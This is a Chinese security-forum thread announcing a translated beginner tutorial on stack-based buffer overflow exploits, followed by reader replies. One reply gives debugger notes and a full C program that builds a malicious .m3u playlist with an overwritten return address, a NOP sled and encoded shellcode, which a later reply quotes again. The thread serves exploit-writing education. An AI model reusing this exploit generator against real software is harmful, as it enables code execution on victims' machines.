首页
社区
课程
招聘
[翻译]Exploit 编写系列教程第一篇:基于栈的溢出
发表于: 2009-11-16 19:59 57830

[翻译]Exploit 编写系列教程第一篇:基于栈的溢出

2009-11-16 19:59
57830

第一篇翻译完成
PS:对初学者来讲这是个很不错的漏洞利用的系列教程,相当详细
详细到让我在翻译过程中倍感纠结


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

上传的附件:
收藏
免费 9
支持
分享
最新回复 (59)
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
3
终于出来了,第二篇目前我正在翻译中,希望有更多的兄弟加入这项翻译工作中来!
2009-11-16 22:43
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
4
yi……怎么没加精呢,上万字哟
2009-11-17 20:01
0
雪    币: 61
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
一定要精呀
2009-11-17 20:21
0
雪    币: 47147
活跃值: (20450)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
6
辛苦辛苦~~
2009-11-17 20:51
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
7
第二篇目前翻译了七千多字,还在翻译中……
2009-11-17 20:54
0
雪    币: 272
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
thanks
2009-11-17 21:17
0
雪    币: 370
活跃值: (52)
能力值: ( LV13,RANK:350 )
在线值:
发帖
回帖
粉丝
9
我跟了下程序的溢出情况,下面的是关键信息,有兴趣的朋友可以详细分析下:
00E58D93    F3:A5           rep     movs dword ptr es:[edi], dword p>   ;这里导致溢出

0041E9E6  |.  81C4 18890000 add     esp, 8918
0041E9EC  \.  C2 0400       retn    4        ;这里覆盖EIP

文中的创建m3u用的perl脚本 我不会 我用C写做测试 贴上来做参考 呵呵:

#include <windows.h>

#pragma comment(linker,"/subsystem:windows")

char Buffer[26094]={0};
DWORD eip=0x73d92ecf; //覆盖返回地址
DWORD param1=0x90909090; //覆盖retn 4 被栈平衡的参数
char nops[25]={0};
char shellcode[]=
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
"\x7f\xe8\x7b\xca";

int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd )
{
HANDLE hFile;
DWORD temp;

hFile=CreateFile("crash.m3u",GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
memset(Buffer,'A',26094);
memset(nops,0x90,25);
WriteFile(hFile,Buffer,26094-31-8,&temp,NULL);
WriteFile(hFile,&eip,4,&temp,NULL);
WriteFile(hFile,¶m1,4,&temp,NULL);
WriteFile(hFile,nops,25,&temp,NULL);
WriteFile(hFile,shellcode,sizeof(shellcode),&temp,NULL);
CloseHandle(hFile);
MessageBox(NULL,"Done","Info",0);
return 0;
}
2009-11-18 16:11
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
10
膜拜moonife,我还想等第二篇翻译完了,也分析一下,结果被你抢先了!建议把软件也传上来吧,呵呵…
2009-11-18 16:40
0
雪    币: 131
活跃值: (98)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
11
支持楼主

期待更精彩的文章
2009-11-18 16:56
0
雪    币: 388
活跃值: (10)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
12
非常的期待啊,呵呵
2009-11-19 21:25
0
雪    币: 2307
活跃值: (1013)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
13
今天才看到,经典,学习了。
2009-11-20 12:37
0
雪    币: 1969
活跃值: (46)
能力值: (RANK:550 )
在线值:
发帖
回帖
粉丝
14
学习了 顺便传一下相应版本的文件
上传的附件:
2009-11-20 14:43
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
15
感谢hawking版主大人分享,哈哈……
2009-11-20 18:13
0
雪    币: 224
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
16
不错不错。支持!!!
2009-11-20 21:28
0
雪    币: 34
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
17
你是只感谢没有下载。。。。。。。
2009-11-20 22:32
0
雪    币: 558
活跃值: (46)
能力值: ( LV2,RANK:16 )
在线值:
发帖
回帖
粉丝
18
支持楼主。。。
等待下一步成果
2009-11-21 00:15
0
雪    币: 390
活跃值: (15)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
19
moonife,你太强悍了,原来你一直忙着翻译这个哈,牛,我也想翻哈。
2009-11-21 02:45
0
雪    币: 270
能力值: (RANK:10 )
在线值:
发帖
回帖
粉丝
20
“这里我们用WinDbg,按照WinDbg(完全安装)和用“windbg -I”注册它为一个“post-mortem”
调试器”
post-mortem debugger 就是即时调试器的意思
2009-11-21 22:41
0
雪    币: 370
活跃值: (52)
能力值: ( LV13,RANK:350 )
在线值:
发帖
回帖
粉丝
21
恩 感谢小天狼星指出
“安装”打成“按照”了
2009-11-21 22:57
0
雪    币: 211
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
22
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" 这是加密的代码吗
2009-12-5 15:44
0
雪    币: 370
活跃值: (52)
能力值: ( LV13,RANK:350 )
在线值:
发帖
回帖
粉丝
23
这个是可以执行,一般用于测试的shellcode
被加密过了,开头部分开始自解码的
你可以拉人OD跟下
2009-12-5 18:11
0
雪    币: 1137
活跃值: (10)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
24
刚在moonife兄的blog里才看到!

我收藏了哈!
2009-12-7 23:15
0
雪    币: 217
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
25
刚看到,收藏了,辛苦
2009-12-8 17:01
0
游客
登录 | 注册 方可回帖
返回
//